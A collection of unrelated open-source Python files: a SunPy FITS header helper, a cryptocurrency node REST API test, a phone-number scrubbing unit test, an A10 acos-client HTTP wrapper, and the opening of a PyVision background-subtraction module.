meta_instrument = _get_instrument_meta(instrument, telescope, observatory, wavelength, exposure)
meta_wcs.update(meta_instrument)
if reference_pixel is None:
reference_pixel = u.Quantity([(data.shape[1] + 1)/2.*u.pixel, (data.shape[0] + 1)/2.*u.pixel])
if scale is None:
scale = [1., 1.] * (u.arcsec/u.pixel)
meta_wcs['crval1'], meta_wcs['crval2'] = (coordinate.spherical.lat.to_value(meta_wcs['cunit1']),
coordinate.spherical.lon.to_value(meta_wcs['cunit2']))
meta_wcs['crpix1'], meta_wcs['crpix2'] = (reference_pixel[0].to_value(u.pixel) + 1,
reference_pixel[1].to_value(u.pixel) + 1)
meta_wcs['cdelt1'], meta_wcs['cdelt2'] = (scale[0].to_value(meta_wcs['cunit1']/u.pixel),
scale[1].to_value(meta_wcs['cunit2']/u.pixel))
if rotation_angle is not None and rotation_matrix is not None:
raise ValueError("Can not specify both rotation angle and rotation matrix.")
if rotation_angle is not None:
lam = meta_wcs['cdelt1'] / meta_wcs['cdelt2']
p = np.deg2rad(rotation_angle)
rotation_matrix = np.array([[np.cos(p), -1 * lam * np.sin(p)],
[1/lam * np.sin(p), np.cos(p)]])
if rotation_matrix is not None:
(meta_wcs['PC1_1'], meta_wcs['PC1_2'],
meta_wcs['PC2_1'], meta_wcs['PC2_2']) = (rotation_matrix[0, 0], rotation_matrix[0, 1],
rotation_matrix[1, 0], rotation_matrix[1, 1])
meta_dict = MetaDict(meta_wcs)
return meta_dict
def _get_wcs_meta(coordinate):
"""
Function to get WCS meta from the SkyCoord using
`astropy.wcs.utils.celestial_frame_to_wcs`
Parameters
----------
coordinate : ~`astropy.coordinates.BaseFrame`
Returns
-------
`dict`
Containing the WCS meta information
* ctype1, ctype2
* cunit1, cunit2
* date_obs
"""
coord_meta = {}
skycoord_wcs = astropy.wcs.utils.celestial_frame_to_wcs(coordinate)
cunit1, cunit2 = skycoord_wcs.wcs.cunit
coord_meta = dict(skycoord_wcs.to_header())
coord_meta['cunit1'], coord_meta['cunit2'] = cunit1.to_string("fits"), cunit2.to_string("fits")
return coord_meta
def _get_observer_meta(coordinate):
"""
Function to get observer meta from coordinate frame.
Parameters
----------
coordinate : ~`astropy.coordinates.BaseFrame`
Returns
-------
`dict`
Containing the WCS meta information
* hgln_obs, hglt_obs
* dsun_obs
* rsun_obs
"""
coord_meta = {}
coord_meta['hgln_obs'] = coordinate.observer.lon.to_value(u.deg)
coord_meta['hglt_obs'] = coordinate.observer.lat.to_value(u.deg)
coord_meta['dsun_obs'] = coordinate.observer.radius.to_value(u.m)
coord_meta['rsun_ref'] = coordinate.rsun.to_value(u.m)
coord_meta['rsun_obs'] = np.arctan(coordinate.rsun / coordinate.observer.radius).to_value(u.arcsec)
return coord_meta
def _get_instrument_meta(instrument, telescope, observatory, wavelength, exposure):
"""
Function to correctly name keywords from keyword arguments
"""
coord = {}
if instrument is not None:
coord['instrume'] = str(instrument)
if telescope is not None:
coord['telescop'] = str(telescope)
if observatory is not None:
coord['obsrvtry'] = str(observatory)
if wavelength is not None:
coord['wavelnth'] = wavelength.to_value()
coord['waveunit'] = wavelength.unit.to_string("fits")
if exposure is not None:
coord['exptime'] = exposure.to_value(u.s)
return coord
_map_meta_keywords = {
'cunit1':
'Units of the coordinate increments along naxis1 e.g. arcsec **required',
'cunit2':
'Units of the coordinate increments along naxis2 e.g. arcsec **required',
'crval1':
'Coordinate value at reference point on naxis1 **required',
'crval2':
'Coordinate value at reference point on naxis2 **required',
'cdelt1':
'Spatial scale of pixels for naxis1, i.e. coordinate increment at reference point',
'cdelt2':
'Spatial scale of pixels for naxis2, i.e. coordinate increment at reference point',
'crpix1':
'Pixel coordinate at reference point naxis1',
'crpix2':
'Pixel coordinate at reference point naxis2',
'ctype1':
'Coordinate type projection along naxis1 of data e.g. HPLT-TAN',
'ctype2':
'Coordinate type projection along naxis2 of data e.g. HPLN-TAN',
'hgln_obs':
'Heliographic longitude of observation',
'hglt_obs':
'Heliographic latitude of observation',
'dsun_obs':
'distance to Sun from observation in metres',
'rsun_obs':
'radius of Sun in meters from observation',
'date-obs':
'date of observation e.g. 2013-10-28 00:00',
'date_obs':
'date of observation e.g. 2013-10-28 00:00',
'rsun_ref':
'reference radius of Sun in meters',
'solar_r':
'radius of Sun in meters from observation',
'radius':
'radius of Sun in meters from observation',
'crln_obs':
'Carrington longitude of observation',
'crlt_obs':
'Heliographic latitude of observation',
'solar_b0':
'Solar B0 angle',
'detector':
'name of detector e.g. AIA',
'exptime':
'exposure time of observation, in seconds e.g 2',
'instrume':
'name of instrument',
'wavelnth':
'wavelength of observation',
'waveunit':
'unit for which observation is taken e.g. angstom',
'obsrvtry':
'name of observatory of observation',
'telescop':
'name of telescope of observation',
'lvl_num':
'FITS processing level',
'crota2':
'Rotation of the horizontal and vertical axes in degrees',
'PC1_1':
'Matrix element PCi_j describing the rotation required to align solar North with the top of the image.',
'PC1_2':
'Matrix element PCi_j describing the rotation required to align solar North with the top of the image.',
'PC2_1':
'Matrix element PCi_j describing the rotation required to align solar North with the top of the image.',
'PC2_2':
'Matrix element PCi_j describing the rotation required to align solar North with the top of the image.',
'CD1_1':
'Matrix element CDi_j describing the rotation required to align solar North with the top of the image.',
'CD1_2':
'Matrix element CDi_j describing the rotation required to align solar North with the top of the image.',
'CD2_1':
'Matrix element CDi_j describing the rotation required to align solar North with the top of the image.',
'CD2_2':
'Matrix element CDi_j describing the rotation required to align solar North with the top of the image.'
}
| {
"content_hash": "a9973774acd52e682b106ec28ee23cab",
"timestamp": "",
"source": "github",
"line_count": 312,
"max_line_length": 108,
"avg_line_length": 37.506410256410255,
"alnum_prop": 0.639890616988549,
"repo_name": "dpshelio/sunpy",
"id": "12ccc46579cbd8cfb9c4deef050860272a5ed78d",
"size": "11702",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sunpy/map/header_helper.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "73732"
},
{
"name": "IDL",
"bytes": "5746"
},
{
"name": "Python",
"bytes": "1922243"
},
{
"name": "Shell",
"bytes": "235"
}
],
"symlink_target": ""
} |
from test_framework.test_framework import PhtevencoinTestFramework
from test_framework.util import *
from struct import *
import binascii
import json
import StringIO
import decimal
try:
import http.client as httplib
except ImportError:
import httplib
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
def deser_uint256(f):
r = 0
for i in range(8):
t = unpack(b"<I", f.read(4))[0]
r += t << (i * 32)
return r
#allows simple http get calls
def http_get_call(host, port, path, response_object = 0):
conn = httplib.HTTPConnection(host, port)
conn.request('GET', path)
if response_object:
return conn.getresponse()
return conn.getresponse().read()
#allows simple http post calls with a request body
def http_post_call(host, port, path, requestdata = '', response_object = 0):
conn = httplib.HTTPConnection(host, port)
conn.request('POST', path, requestdata)
if response_object:
return conn.getresponse()
return conn.getresponse().read()
class RESTTest (PhtevencoinTestFramework):
FORMAT_SEPARATOR = "."
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 3)
def setup_network(self, split=False):
self.nodes = start_nodes(3, self.options.tmpdir)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.is_network_split=False
self.sync_all()
def run_test(self):
url = urlparse.urlparse(self.nodes[0].url)
print "Mining blocks..."
self.nodes[0].generate(1)
self.sync_all()
self.nodes[2].generate(100)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 50)
txid = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.1)
self.sync_all()
self.nodes[2].generate(1)
self.sync_all()
bb_hash = self.nodes[0].getbestblockhash()
assert_equal(self.nodes[1].getbalance(), Decimal("0.1")) #balance now should be 0.1 on node 1
# load the latest 0.1 tx over the REST API
json_string = http_get_call(url.hostname, url.port, '/rest/tx/'+txid+self.FORMAT_SEPARATOR+"json")
json_obj = json.loads(json_string)
vintx = json_obj['vin'][0]['txid'] # get the vin to later check for utxo (should be spent by then)
# get n of 0.1 outpoint
n = 0
for vout in json_obj['vout']:
if vout['value'] == 0.1:
n = vout['n']
######################################
# GETUTXOS: query a unspent outpoint #
######################################
json_request = '/checkmempool/'+txid+'-'+str(n)
json_string = http_get_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
#check chainTip response
assert_equal(json_obj['chaintipHash'], bb_hash)
#make sure there is one utxo
assert_equal(len(json_obj['utxos']), 1)
assert_equal(json_obj['utxos'][0]['value'], 0.1)
################################################
# GETUTXOS: now query a already spent outpoint #
################################################
json_request = '/checkmempool/'+vintx+'-0'
json_string = http_get_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
#check chainTip response
assert_equal(json_obj['chaintipHash'], bb_hash)
#make sure there is no utox in the response because this oupoint has been spent
assert_equal(len(json_obj['utxos']), 0)
#check bitmap
assert_equal(json_obj['bitmap'], "0")
##################################################
# GETUTXOS: now check both with the same request #
##################################################
json_request = '/checkmempool/'+txid+'-'+str(n)+'/'+vintx+'-0'
json_string = http_get_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
assert_equal(len(json_obj['utxos']), 1)
assert_equal(json_obj['bitmap'], "10")
#test binary response
bb_hash = self.nodes[0].getbestblockhash()
binaryRequest = b'\x01\x02'
binaryRequest += binascii.unhexlify(txid)
binaryRequest += pack("i", n);
binaryRequest += binascii.unhexlify(vintx);
binaryRequest += pack("i", 0);
bin_response = http_post_call(url.hostname, url.port, '/rest/getutxos'+self.FORMAT_SEPARATOR+'bin', binaryRequest)
output = StringIO.StringIO()
output.write(bin_response)
output.seek(0)
chainHeight = unpack("i", output.read(4))[0]
hashFromBinResponse = hex(deser_uint256(output))[2:].zfill(65).rstrip("L")
assert_equal(bb_hash, hashFromBinResponse) #check if getutxo's chaintip during calculation was fine
assert_equal(chainHeight, 102) #chain height must be 102
############################
# GETUTXOS: mempool checks #
############################
# do a tx and don't sync
txid = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 0.1)
json_string = http_get_call(url.hostname, url.port, '/rest/tx/'+txid+self.FORMAT_SEPARATOR+"json")
json_obj = json.loads(json_string)
vintx = json_obj['vin'][0]['txid'] # get the vin to later check for utxo (should be spent by then)
# get n of 0.1 outpoint
n = 0
for vout in json_obj['vout']:
if vout['value'] == 0.1:
n = vout['n']
json_request = '/'+txid+'-'+str(n)
json_string = http_get_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
assert_equal(len(json_obj['utxos']), 0) #there should be a outpoint because it has just added to the mempool
json_request = '/checkmempool/'+txid+'-'+str(n)
json_string = http_get_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
assert_equal(len(json_obj['utxos']), 1) #there should be a outpoint because it has just added to the mempool
#do some invalid requests
json_request = '{"checkmempool'
response = http_post_call(url.hostname, url.port, '/rest/getutxos'+self.FORMAT_SEPARATOR+'json', json_request, True)
assert_equal(response.status, 500) #must be a 500 because we send a invalid json request
json_request = '{"checkmempool'
response = http_post_call(url.hostname, url.port, '/rest/getutxos'+self.FORMAT_SEPARATOR+'bin', json_request, True)
assert_equal(response.status, 500) #must be a 500 because we send a invalid bin request
response = http_post_call(url.hostname, url.port, '/rest/getutxos/checkmempool'+self.FORMAT_SEPARATOR+'bin', '', True)
assert_equal(response.status, 500) #must be a 500 because we send a invalid bin request
#test limits
json_request = '/checkmempool/'
for x in range(0, 20):
json_request += txid+'-'+str(n)+'/'
json_request = json_request.rstrip("/")
response = http_post_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json', '', True)
assert_equal(response.status, 500) #must be a 500 because we exceeding the limits
json_request = '/checkmempool/'
for x in range(0, 15):
json_request += txid+'-'+str(n)+'/'
json_request = json_request.rstrip("/");
response = http_post_call(url.hostname, url.port, '/rest/getutxos'+json_request+self.FORMAT_SEPARATOR+'json', '', True)
assert_equal(response.status, 200) #must be a 500 because we exceeding the limits
self.nodes[0].generate(1) #generate block to not affect upcoming tests
self.sync_all()
################
# /rest/block/ #
################
# check binary format
response = http_get_call(url.hostname, url.port, '/rest/block/'+bb_hash+self.FORMAT_SEPARATOR+"bin", True)
assert_equal(response.status, 200)
assert_greater_than(int(response.getheader('content-length')), 80)
response_str = response.read()
# compare with block header
response_header = http_get_call(url.hostname, url.port, '/rest/headers/1/'+bb_hash+self.FORMAT_SEPARATOR+"bin", True)
assert_equal(response_header.status, 200)
assert_equal(int(response_header.getheader('content-length')), 80)
response_header_str = response_header.read()
assert_equal(response_str[0:80], response_header_str)
# check block hex format
response_hex = http_get_call(url.hostname, url.port, '/rest/block/'+bb_hash+self.FORMAT_SEPARATOR+"hex", True)
assert_equal(response_hex.status, 200)
assert_greater_than(int(response_hex.getheader('content-length')), 160)
response_hex_str = response_hex.read()
assert_equal(response_str.encode("hex")[0:160], response_hex_str[0:160])
# compare with hex block header
response_header_hex = http_get_call(url.hostname, url.port, '/rest/headers/1/'+bb_hash+self.FORMAT_SEPARATOR+"hex", True)
assert_equal(response_header_hex.status, 200)
assert_greater_than(int(response_header_hex.getheader('content-length')), 160)
response_header_hex_str = response_header_hex.read()
assert_equal(response_hex_str[0:160], response_header_hex_str[0:160])
assert_equal(response_header_str.encode("hex")[0:160], response_header_hex_str[0:160])
# check json format
block_json_string = http_get_call(url.hostname, url.port, '/rest/block/'+bb_hash+self.FORMAT_SEPARATOR+'json')
block_json_obj = json.loads(block_json_string)
assert_equal(block_json_obj['hash'], bb_hash)
# compare with json block header
response_header_json = http_get_call(url.hostname, url.port, '/rest/headers/1/'+bb_hash+self.FORMAT_SEPARATOR+"json", True)
assert_equal(response_header_json.status, 200)
response_header_json_str = response_header_json.read()
json_obj = json.loads(response_header_json_str, parse_float=decimal.Decimal)
assert_equal(len(json_obj), 1) #ensure that there is one header in the json response
assert_equal(json_obj[0]['hash'], bb_hash) #request/response hash should be the same
#compare with normal RPC block response
rpc_block_json = self.nodes[0].getblock(bb_hash)
assert_equal(json_obj[0]['hash'], rpc_block_json['hash'])
assert_equal(json_obj[0]['confirmations'], rpc_block_json['confirmations'])
assert_equal(json_obj[0]['height'], rpc_block_json['height'])
assert_equal(json_obj[0]['version'], rpc_block_json['version'])
assert_equal(json_obj[0]['merkleroot'], rpc_block_json['merkleroot'])
assert_equal(json_obj[0]['time'], rpc_block_json['time'])
assert_equal(json_obj[0]['nonce'], rpc_block_json['nonce'])
assert_equal(json_obj[0]['bits'], rpc_block_json['bits'])
assert_equal(json_obj[0]['difficulty'], rpc_block_json['difficulty'])
assert_equal(json_obj[0]['chainwork'], rpc_block_json['chainwork'])
assert_equal(json_obj[0]['previousblockhash'], rpc_block_json['previousblockhash'])
#see if we can get 5 headers in one response
self.nodes[1].generate(5)
self.sync_all()
response_header_json = http_get_call(url.hostname, url.port, '/rest/headers/5/'+bb_hash+self.FORMAT_SEPARATOR+"json", True)
assert_equal(response_header_json.status, 200)
response_header_json_str = response_header_json.read()
json_obj = json.loads(response_header_json_str)
assert_equal(len(json_obj), 5) #now we should have 5 header objects
# do tx test
tx_hash = block_json_obj['tx'][0]['txid'];
json_string = http_get_call(url.hostname, url.port, '/rest/tx/'+tx_hash+self.FORMAT_SEPARATOR+"json")
json_obj = json.loads(json_string)
assert_equal(json_obj['txid'], tx_hash)
# check hex format response
hex_string = http_get_call(url.hostname, url.port, '/rest/tx/'+tx_hash+self.FORMAT_SEPARATOR+"hex", True)
assert_equal(hex_string.status, 200)
assert_greater_than(int(response.getheader('content-length')), 10)
# check block tx details
# let's make 3 tx and mine them on node 1
txs = []
txs.append(self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 11))
txs.append(self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 11))
txs.append(self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 11))
self.sync_all()
# check that there are exactly 3 transactions in the TX memory pool before generating the block
json_string = http_get_call(url.hostname, url.port, '/rest/mempool/info'+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
assert_equal(json_obj['size'], 3)
# the size of the memory pool should be greater than 3x ~100 bytes
assert_greater_than(json_obj['bytes'], 300)
# check that there are our submitted transactions in the TX memory pool
json_string = http_get_call(url.hostname, url.port, '/rest/mempool/contents'+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
for tx in txs:
assert_equal(tx in json_obj, True)
# now mine the transactions
newblockhash = self.nodes[1].generate(1)
self.sync_all()
#check if the 3 tx show up in the new block
json_string = http_get_call(url.hostname, url.port, '/rest/block/'+newblockhash[0]+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
for tx in json_obj['tx']:
if not 'coinbase' in tx['vin'][0]: #exclude coinbase
assert_equal(tx['txid'] in txs, True)
#check the same but without tx details
json_string = http_get_call(url.hostname, url.port, '/rest/block/notxdetails/'+newblockhash[0]+self.FORMAT_SEPARATOR+'json')
json_obj = json.loads(json_string)
for tx in txs:
assert_equal(tx in json_obj['tx'], True)
#test rest bestblock
bb_hash = self.nodes[0].getbestblockhash()
json_string = http_get_call(url.hostname, url.port, '/rest/chaininfo.json')
json_obj = json.loads(json_string)
assert_equal(json_obj['bestblockhash'], bb_hash)
if __name__ == '__main__':
RESTTest ().main ()
| {
"content_hash": "e18df274410c14f30307ddd9f4636013",
"timestamp": "",
"source": "github",
"line_count": 333,
"max_line_length": 132,
"avg_line_length": 45.171171171171174,
"alnum_prop": 0.6149448211673979,
"repo_name": "ravenbyron/phtevencoin",
"id": "5e28cc625c39777e7e69ab50108adb48f5e4c70c",
"size": "15284",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qa/rpc-tests/rest.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "541198"
},
{
"name": "C++",
"bytes": "3851465"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "Groff",
"bytes": "18737"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2104"
},
{
"name": "Makefile",
"bytes": "69869"
},
{
"name": "Objective-C",
"bytes": "2034"
},
{
"name": "Objective-C++",
"bytes": "7256"
},
{
"name": "Protocol Buffer",
"bytes": "2324"
},
{
"name": "Python",
"bytes": "479309"
},
{
"name": "QMake",
"bytes": "2024"
},
{
"name": "Shell",
"bytes": "33962"
}
],
"symlink_target": ""
} |
import unittest
from base import BaseTestCase
class PhoneNumberTestCase(unittest.TestCase, BaseTestCase):
def create_docstring(self, phone_number):
return """
BEFORE: My phone number is %s
AFTER: My phone number is {{PHONE}}
""" % phone_number
def check_phone_numbers(self, *phone_numbers):
for phone_number in phone_numbers:
self.compare_before_after(
docstring=self.create_docstring(phone_number),
)
def test_american_phone_number(self):
"""test american-style phone numbers"""
self.check_phone_numbers(
'1-312-515-2239',
'+1-312-515-2239',
'1 (312) 515-2239',
'312-515-2239',
'(312) 515-2239',
'(312)515-2239',
)
def test_extension_phone_numbers(self):
"""test phone numbers with extensions"""
self.check_phone_numbers(
'312-515-2239 x12',
'312-515-2239 ext. 12',
'312-515-2239 ext.12',
)
def test_international_phone_numbers(self):
"""test international phone numbers"""
self.check_phone_numbers(
'+47 21 30 85 99',
'+45 69 19 88 56',
'+46 852 503 499',
'+31 619 837 236',
'+86 135 3727 4136',
'+61267881324',
)
def test_multiple_phone_numbers(self):
# running this through scrubadub.clean replaces 'reached at
# 312.714.8142' with '{{EMAIL}}'. See issue
result = self.clean(
u'Call me on my cell 312.714.8142 or in my office 773.415.7432'
)
self.assertEqual(
result,
u'Call me on my cell {{PHONE}} or in my office {{PHONE}}',
'problem with multiple phone numbers: \n %s' % result,
)
| {
"content_hash": "07b9f612145f6de5c4b3cb8f62d7abb2",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 75,
"avg_line_length": 30.833333333333332,
"alnum_prop": 0.5410810810810811,
"repo_name": "datascopeanalytics/scrubadub",
"id": "44679082923e024843dab607e9bd1340db00e86a",
"size": "1850",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_detector_phone_numbers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "57477"
},
{
"name": "Shell",
"bytes": "932"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
from __future__ import unicode_literals
import json
import logging
import time
from requests.adapters import HTTPAdapter
from requests import Session
import acos_client
from acos_client import logutils
from acos_client.v30 import responses as acos_responses
LOG = logging.getLogger(__name__)
broken_replies = {
"": '{"response": {"status": "OK"}}'
}
class HttpClient(object):
AXAPI_DEFAULT_REQ_TIMEOUT = 300
HEADERS = {
"Content-type": "application/json",
"User-Agent": "ACOS-Client-AGENT-%s" % acos_client.VERSION,
}
def __init__(self, host, port=None, protocol="https", max_retries=3,
timeout=AXAPI_DEFAULT_REQ_TIMEOUT):
if port is None:
if protocol == 'http':
self.port = 80
else:
self.port = 443
else:
self.port = port
self.url_base = "%s://%s:%s" % (protocol, host, self.port)
self.max_retries = max_retries
self.timeout = timeout
def dict_underscore_to_dash(self, my_dict):
if type(my_dict) is list:
item_list = []
for item in my_dict:
item_list.append(self.dict_underscore_to_dash(item))
return item_list
elif type(my_dict) is dict:
item_dict = {}
for k, v in my_dict.items():
item_dict[k.replace('_', '-')] = self.dict_underscore_to_dash(v)
return item_dict
else:
return my_dict
def request_impl(self, method, api_url, params={}, headers=None,
file_name=None, file_content=None, axapi_args=None,
max_retries=None, timeout=None, **kwargs):
LOG.debug("axapi_http: full url = %s", self.url_base + api_url)
LOG.debug("axapi_http: %s url = %s", method, api_url)
LOG.debug("axapi_http: params = %s", json.dumps(logutils.clean(params), indent=4))
valid_http_codes = [200, 204]
# Update params with axapi_args for currently unsupported configuration of objects
if axapi_args is not None:
formatted_axapi_args = self.dict_underscore_to_dash(axapi_args)
params = acos_client.v21.axapi_http.merge_dicts(params, formatted_axapi_args)
LOG.debug("axapi_http: params + axapi_args = %s", json.dumps(logutils.clean(params), indent=4))
# Set data" variable for the request
if params:
params_copy = params.copy()
LOG.debug("axapi_http: params_all = %s", logutils.clean(params_copy))
payload = json.dumps(params_copy)
else:
payload = None
if (file_name is None and file_content is not None) or \
(file_name is not None and file_content is None):
raise ValueError("file_name and file_content must both be populated if one is")
if not max_retries:
max_retries = self.max_retries
if not timeout:
timeout = self.timeout
# Set "headers" variable for the request
request_headers = self.HEADERS.copy()
if headers:
request_headers.update(headers)
LOG.debug("axapi_http: headers = %s", json.dumps(logutils.clean(request_headers), indent=4))
# Process files if passed as a parameter
if file_name is not None:
files = {
'file': (file_name, file_content, "application/octet-stream"),
'json': ('blob', payload, "application/json")
}
request_headers.pop("Content-type", None)
request_headers.pop("Content-Type", None)
# Create session to set HTTPAdapter or SSLAdapter and set max_retries
session = Session()
if self.port == 443:
session.mount('https://', HTTPAdapter(max_retries=max_retries))
else:
session.mount('http://', HTTPAdapter(max_retries=max_retries))
session_request = getattr(session, method.lower())
# Make actual request and handle any errors
try:
if file_name is not None:
device_response = session_request(
self.url_base + api_url, verify=False, files=files, headers=request_headers, timeout=timeout
)
else:
device_response = session_request(
self.url_base + api_url, verify=False, data=payload, headers=request_headers, timeout=timeout
)
except (Exception) as e:
LOG.error("acos_client failing with error %s after %s retries", e.__class__.__name__, max_retries)
raise e
finally:
session.close()
# Validate json response
try:
json_response = device_response.json()
LOG.debug("axapi_http: data = %s", json.dumps(logutils.clean(json_response), indent=4))
except ValueError as e:
# The response is not JSON but it still succeeded.
if device_response.status_code in valid_http_codes:
return device_response.text
else:
raise e
# Handle "fail" responses returned by AXAPI
if 'response' in json_response and 'status' in json_response['response']:
if json_response['response']['status'] == 'fail':
acos_responses.raise_axapi_ex(json_response, method, api_url)
# Handle "authorizationschema" responses returned by AXAPI
if 'authorizationschema' in json_response:
acos_responses.raise_axapi_auth_error(json_response, method, api_url, headers)
return json_response
def request(self, method, api_url, params={}, headers=None,
file_name=None, file_content=None, axapi_args=None,
max_retries=None, timeout=None, **kwargs):
retry_timeout = 300
if timeout and timeout > retry_timeout:
retry_timeout = timeout
start_time = time.time()
loop = True
while loop:
try:
return self.request_impl(method, api_url, params, headers,
file_name=file_name, file_content=file_content,
max_retries=max_retries,
timeout=timeout, axapi_args=axapi_args,
**kwargs)
except acos_responses.axapi_retry_exceptions() as e:
LOG.warning("ACOS device system is busy: %s", str(e))
loop = ((time.time() - start_time) <= retry_timeout)
if not loop:
raise e
time.sleep(1)
except (Exception) as e:
raise e
def get(self, api_url, params={}, headers=None, max_retries=None, timeout=None, axapi_args=None, **kwargs):
return self.request("GET", api_url, params, headers, max_retries=max_retries,
timeout=timeout, axapi_args=axapi_args, **kwargs)
def post(self, api_url, params={}, headers=None, max_retries=None, timeout=None, axapi_args=None, **kwargs):
return self.request("POST", api_url, params, headers, max_retries=max_retries,
timeout=timeout, axapi_args=axapi_args, **kwargs)
def put(self, api_url, params={}, headers=None, max_retries=None, timeout=None, axapi_args=None, **kwargs):
return self.request("PUT", api_url, params, headers, max_retries=max_retries,
timeout=timeout, axapi_args=axapi_args, **kwargs)
def delete(self, api_url, params={}, headers=None, max_retries=None, timeout=None, axapi_args=None, **kwargs):
return self.request("DELETE", api_url, params, headers, max_retries=max_retries,
timeout=timeout, axapi_args=axapi_args, **kwargs)
| {
"content_hash": "212a5f0c3aad3437ef2a79b937523bc4",
"timestamp": "",
"source": "github",
"line_count": 190,
"max_line_length": 114,
"avg_line_length": 41.61578947368421,
"alnum_prop": 0.5755659542177817,
"repo_name": "a10networks/acos-client",
"id": "382d09c8bedc35502a9bcb8065b64f3f2d5a37b6",
"size": "8530",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "acos_client/v30/axapi_http.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "563101"
}
],
"symlink_target": ""
} |
'''
Created on Oct 22, 2010
@author: Stephen O'Hara
'''
# PyVision License
#
# Copyright (c) 2006-2008 Stephen O'Hara
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither name of copyright holders nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import scipy as sp
import pyvision as pv
import math
import cv
#Constants used to identify a background subtraction method,
# useful, for example, for specifying which method to use in the
# MotionDetector class.
BG_SUBTRACT_FD = "BG_SUBTRACT_FD" #frame differencer
BG_SUBTRACT_MCFD = "BG_SUBTRACT_MCFD" #motion compensated frame differencer
BG_SUBTRACT_MF = "BG_SUBTRACT_MF" #median filter
BG_SUBTRACT_AMF = "BG_SUBTRACT_AMF" #approx median filter
class AbstractBGModel:
def __init__(self, imageBuffer, thresh=20, soft_thresh=False):
'''
@param imageBuffer: An ImageBuffer object that has already been filled
with the appropriate number of images. (Provide a full buffer...so a few
frames of initialization will be required in most cases to fill up a
newly created buffer.)
@param thresh: A noise threshold to remove very small differences.
'''
self._imageBuffer = imageBuffer
self._threshold = thresh
self._softThreshold = soft_thresh
def _computeBGDiff(self):
'''
This private method should be overridden by a concrete background subtraction
class to yield a difference image from the background model.
'''
raise NotImplemented
def getForegroundMask(self):
'''
@return: A mask image indicating which pixels are considered foreground.
Depending on whether soft-thresholding is used, this may be a binary image
with values of [0 or 255], or image of weights [0.0-255.0], which will
have to be divided by 255 to get weights [0.0-1.0].
@note: One may wish to perform additional morphological operations
on the foreground mask prior to use.
'''
diff = self._computeBGDiff()
if self._softThreshold:
mask = 1 - (math.e)**(-(1.0*diff)/self._threshold) #element-wise exp weighting
#mask = (diff > self._threshold)
else:
mask = (sp.absolute(diff) > self._threshold)
#mu = sp.mean(diff)
#sigma = sp.std(diff)
#mask = sp.absolute((diff-mu)/sigma) > self._threshold
return pv.Image(mask*255.0)
class FrameDifferencer(AbstractBGModel):
'''
This class is useful for simple N-frame differencing method of
background subtraction. If you have a stationary camera, this can
be a simple and effective way to isolate people/moving objects
from the background scene.
FrameDifferencer uses ImageBuffer for operation. Assume the buffer
size is 5. The output of the frame differencing operation will
be based on the middle image, the 3rd in the buffer. The output
is the intersection of the following two absolute differences:
abs(Middle-First) AND abs(Last-Middle).
'''
def __init__(self, imageBuffer, thresh=20, soft_thresh = False):
